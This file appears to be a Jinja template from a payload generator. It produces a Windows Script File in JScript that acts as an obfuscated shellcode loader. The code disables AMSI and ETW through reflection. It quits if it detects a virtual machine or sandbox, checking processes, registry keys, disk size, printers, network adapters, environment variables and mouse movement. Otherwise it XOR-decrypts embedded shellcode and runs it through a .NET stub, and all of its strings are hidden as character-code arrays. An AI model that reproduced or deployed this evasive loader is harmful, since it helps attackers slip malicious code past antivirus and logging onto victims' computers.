<?xml version="1.0" encoding="utf-8"?>
<package>
<job id="{{ v.job_id }}">
<script language="JScript">
<![CDATA[
function {{ v.fn_build_str }}(a){var s="";for(var i=0;i<a.length;i++)s+=String.fromCharCode(a[i]);return s;}

function {{ v.fn_amsi }}() {
    try {
        var {{ v.jsc_lv_aa }}  = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}]));
        var {{ v.jsc_lv_at }} = {{ v.jsc_lv_aa }}.GetType({{ v.fn_build_str }}([{{ v.jsc_auto_amsi_utils }}]));
        if ({{ v.jsc_lv_at }} !== null) {
            {{ v.jsc_lv_at }}.GetField({{ v.fn_build_str }}([{{ v.jsc_amsi_init_fail }}]), (4|32)).SetValue(null, true);
        }
    } catch(e) {}
}

function {{ v.fn_etw }}() {
    try {
        var {{ v.jsc_lv_ea }} = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}]));
        var {{ v.jsc_lv_et }} = {{ v.jsc_lv_ea }}.GetType({{ v.fn_build_str }}([{{ v.jsc_eventing_ep }}]));
        if ({{ v.jsc_lv_et }} !== null) {
            var {{ v.jsc_lv_ef }} = {{ v.jsc_lv_et }}.GetField({{ v.fn_build_str }}([{{ v.jsc_m_enabled }}]), (4|32));
            if ({{ v.jsc_lv_ef }} !== null) {{ v.jsc_lv_ef }}.SetValue(null, 0);
        }
    } catch(e) {}
}

function {{ v.fn_sandbox }}() {
    try {
        var {{ v.jsc_lv_wmi }} = GetObject({{ v.fn_build_str }}([{{ v.jsc_winmgmts }}]));
        var {{ v.jsc_lv_pq }}  = {{ v.jsc_lv_wmi }}.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_proc_q }}]));
        var {{ v.jsc_lv_bad }} = {{ v.fn_build_str }}([{{ v.jsc_vm_procs }}]).split("|");
        for (var {{ v.jsc_lv_e }} = new Enumerator({{ v.jsc_lv_pq }}); !{{ v.jsc_lv_e }}.atEnd(); {{ v.jsc_lv_e }}.moveNext()) {
            var {{ v.jsc_lv_n }} = {{ v.jsc_lv_e }}.item().Name.toLowerCase();
            for (var i = 0; i < {{ v.jsc_lv_bad }}.length; i++) { if ({{ v.jsc_lv_n }} === {{ v.jsc_lv_bad }}[i]) return true; }
        }
        var {{ v.jsc_lv_mq }} = {{ v.jsc_lv_wmi }}.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_monitor_q }}]));
        for (var {{ v.jsc_lv_em }} = new Enumerator({{ v.jsc_lv_mq }}); !{{ v.jsc_lv_em }}.atEnd(); {{ v.jsc_lv_em }}.moveNext()) {
            var {{ v.jsc_lv_d }} = {{ v.jsc_lv_em }}.item();
            if ({{ v.jsc_lv_d }}.ScreenWidth && {{ v.jsc_lv_d }}.ScreenWidth < 800) return true;
        }
    } catch(e) {}
    try {
        var {{ v.jsc_lv_sh }} = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_wscript_shell }}]));
        var {{ v.jsc_lv_vmr }}=[{{ jsc_vmware_reg_enc }}],{{ v.jsc_lv_vmx }}={{ jsc_vmware_reg_xk }};
        for(var {{ v.jsc_lv_ri }}=0;{{ v.jsc_lv_ri }}<{{ v.jsc_lv_vmr }}.length;{{ v.jsc_lv_ri }}++){{ v.jsc_lv_vmr }}[{{ v.jsc_lv_ri }}]^={{ v.jsc_lv_vmx }};
        {{ v.jsc_lv_sh }}.RegRead({{ v.fn_build_str }}({{ v.jsc_lv_vmr }}));
        return true;
    } catch(e) {}
    try {
        var {{ v.jsc_lv_sh2 }} = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_wscript_shell }}]));
        var {{ v.jsc_lv_vbr }}=[{{ jsc_vbox_reg_enc }}],{{ v.jsc_lv_vbx }}={{ jsc_vbox_reg_xk }};
        for(var {{ v.jsc_lv_ri2 }}=0;{{ v.jsc_lv_ri2 }}<{{ v.jsc_lv_vbr }}.length;{{ v.jsc_lv_ri2 }}++){{ v.jsc_lv_vbr }}[{{ v.jsc_lv_ri2 }}]^={{ v.jsc_lv_vbx }};
        {{ v.jsc_lv_sh2 }}.RegRead({{ v.fn_build_str }}({{ v.jsc_lv_vbr }}));
        return true;
    } catch(e) {}
    try {
        var {{ v.jsc_lv_fso }} = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_fs_obj }}]));
        var {{ v.jsc_lv_drv }} = {{ v.jsc_lv_fso }}.GetDrive("C:");
        if ({{ v.jsc_lv_drv }}.TotalSize < 53687091200) return true;
    } catch(e) {}
    try {
        var {{ v.jsc_lv_wmi2 }} = GetObject({{ v.fn_build_str }}([{{ v.jsc_winmgmts }}]));
        var {{ v.jsc_lv_prq }} = {{ v.jsc_lv_wmi2 }}.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_printer_q }}]));
        var {{ v.jsc_lv_pc }} = 0;
        for (var {{ v.jsc_lv_ep2 }} = new Enumerator({{ v.jsc_lv_prq }}); !{{ v.jsc_lv_ep2 }}.atEnd(); {{ v.jsc_lv_ep2 }}.moveNext()) {{ v.jsc_lv_pc }}++;
        if ({{ v.jsc_lv_pc }} === 0) return true;
    } catch(e) {}
    try {
        var {{ v.jsc_lv_wmi3 }} = GetObject({{ v.fn_build_str }}([{{ v.jsc_winmgmts }}]));
        var {{ v.jsc_lv_naq }} = {{ v.jsc_lv_wmi3 }}.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_mac_q }}]));
        var {{ v.jsc_lv_nac }} = 0;
        for (var {{ v.jsc_lv_ena }} = new Enumerator({{ v.jsc_lv_naq }}); !{{ v.jsc_lv_ena }}.atEnd(); {{ v.jsc_lv_ena }}.moveNext()) {{ v.jsc_lv_nac }}++;
        if ({{ v.jsc_lv_nac }} < 2) return true;
    } catch(e) {}
    try {
        var {{ v.jsc_lv_envobj }} = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_wscript_shell }}])).Environment("Process");
        if ({{ v.jsc_lv_envobj }}({{ v.fn_build_str }}([{{ v.jsc_env_vbox }}])) !== "") return true;
        if ({{ v.jsc_lv_envobj }}({{ v.fn_build_str }}([{{ v.jsc_env_sandboxie }}])) !== "") return true;
    } catch(e) {}
    return false;
}

var {{ v.var_sc }}  = {% for chunk in shellcode_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %};
var {{ v.var_key }} = {% for chunk in key_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %};

function {{ v.fn_hex2arr }}(h) {
    var a = []; for (var i = 0; i < h.length; i += 2)
        a.push(parseInt(h.substr(i, 2), 16));
    return a;
}

function {{ v.fn_decrypt }}(d, k) {
    var o = []; for (var i = 0; i < d.length; i++)
        o.push(d[i] ^ k[i % k.length]);
    return o;
}

function {{ v.fn_exec }}() {
    if ({{ v.fn_sandbox }}()) { WScript.Quit(0); }
    var {{ v.jsc_lv_cx }} = -999, {{ v.jsc_lv_cy }} = -999;
    try {
        var {{ v.jsc_lv_a1 }}=new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}])),{{ v.jsc_lv_w1 }}={{ v.jsc_lv_a1 }}.LoadWithPartialName({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms }}]));
        if({{ v.jsc_lv_w1 }}){var {{ v.jsc_lv_t1 }}={{ v.jsc_lv_w1 }}.GetType({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms_cur }}]));
        if({{ v.jsc_lv_t1 }}){var {{ v.jsc_lv_pp1 }}={{ v.jsc_lv_t1 }}.GetProperty({{ v.fn_build_str }}([{{ v.jsc_cursor_position }}]),24);
        if({{ v.jsc_lv_pp1 }}){var {{ v.jsc_lv_ps1 }}={{ v.jsc_lv_pp1 }}.GetValue(null,null);if({{ v.jsc_lv_ps1 }}){ {{ v.jsc_lv_cx }}={{ v.jsc_lv_ps1 }}.GetType().GetProperty({{ v.fn_build_str }}([88])).GetValue({{ v.jsc_lv_ps1 }},null);{{ v.jsc_lv_cy }}={{ v.jsc_lv_ps1 }}.GetType().GetProperty({{ v.fn_build_str }}([89])).GetValue({{ v.jsc_lv_ps1 }},null);}}}}
    } catch(e) {}
    WScript.Sleep(2000 + Math.floor(Math.random() * 3000));
    if ({{ v.jsc_lv_cx }} !== -999) {
        try {
            var {{ v.jsc_lv_a2 }}=new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}])),{{ v.jsc_lv_w2 }}={{ v.jsc_lv_a2 }}.LoadWithPartialName({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms }}]));
            if({{ v.jsc_lv_w2 }}){var {{ v.jsc_lv_t2 }}={{ v.jsc_lv_w2 }}.GetType({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms_cur }}]));
            if({{ v.jsc_lv_t2 }}){var {{ v.jsc_lv_pp2 }}={{ v.jsc_lv_t2 }}.GetProperty({{ v.fn_build_str }}([{{ v.jsc_cursor_position }}]),24);
            if({{ v.jsc_lv_pp2 }}){var {{ v.jsc_lv_ps2 }}={{ v.jsc_lv_pp2 }}.GetValue(null,null);if({{ v.jsc_lv_ps2 }}){var {{ v.jsc_lv_cx2 }}={{ v.jsc_lv_ps2 }}.GetType().GetProperty({{ v.fn_build_str }}([88])).GetValue({{ v.jsc_lv_ps2 }},null);var {{ v.jsc_lv_cy2 }}={{ v.jsc_lv_ps2 }}.GetType().GetProperty({{ v.fn_build_str }}([89])).GetValue({{ v.jsc_lv_ps2 }},null);if({{ v.jsc_lv_cx }}==={{ v.jsc_lv_cx2 }}&&{{ v.jsc_lv_cy }}==={{ v.jsc_lv_cy2 }})WScript.Quit(0);}}}}
        } catch(e2) {}
    }
    {{ v.fn_amsi }}();
    {{ v.fn_etw }}();
    var {{ v.jsc_lv_k }} = {{ v.fn_hex2arr }}({{ v.var_key }});
    for (var {{ v.jsc_lv_ki }} = 0; {{ v.jsc_lv_ki }} < {{ v.jsc_lv_k }}.length; {{ v.jsc_lv_ki }}++) {{ v.jsc_lv_k }}[{{ v.jsc_lv_ki }}] ^= {{ key_tweak }};
    var {{ v.jsc_lv_sc }}  = {{ v.fn_decrypt }}({{ v.fn_hex2arr }}({{ v.var_sc }}), {{ v.jsc_lv_k }});
    var {{ v.jsc_lv_loader }} = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}]));
    var {{ v.jsc_lv_stub }}   = {{ v.fn_hex2arr }}("{{ dotnet_stub_hex }}");
    var {{ v.jsc_lv_asm }}    = {{ v.jsc_lv_loader }}.Load({{ v.jsc_lv_stub }});
    var {{ v.jsc_lv_t1 }}     = {{ v.jsc_lv_asm }}.GetType({{ v.fn_build_str }}([{{ v.jsc_stub_loader }}]));
    var {{ v.jsc_lv_mi }}     = {{ v.jsc_lv_t1 }}.GetMethod({{ v.fn_build_str }}([{{ v.jsc_stub_run }}]));
    {{ v.jsc_lv_mi }}.Invoke(null, [{{ v.jsc_lv_sc }}]);
}

{{ v.fn_exec }}();
]]>
</script>
</job>
</package>
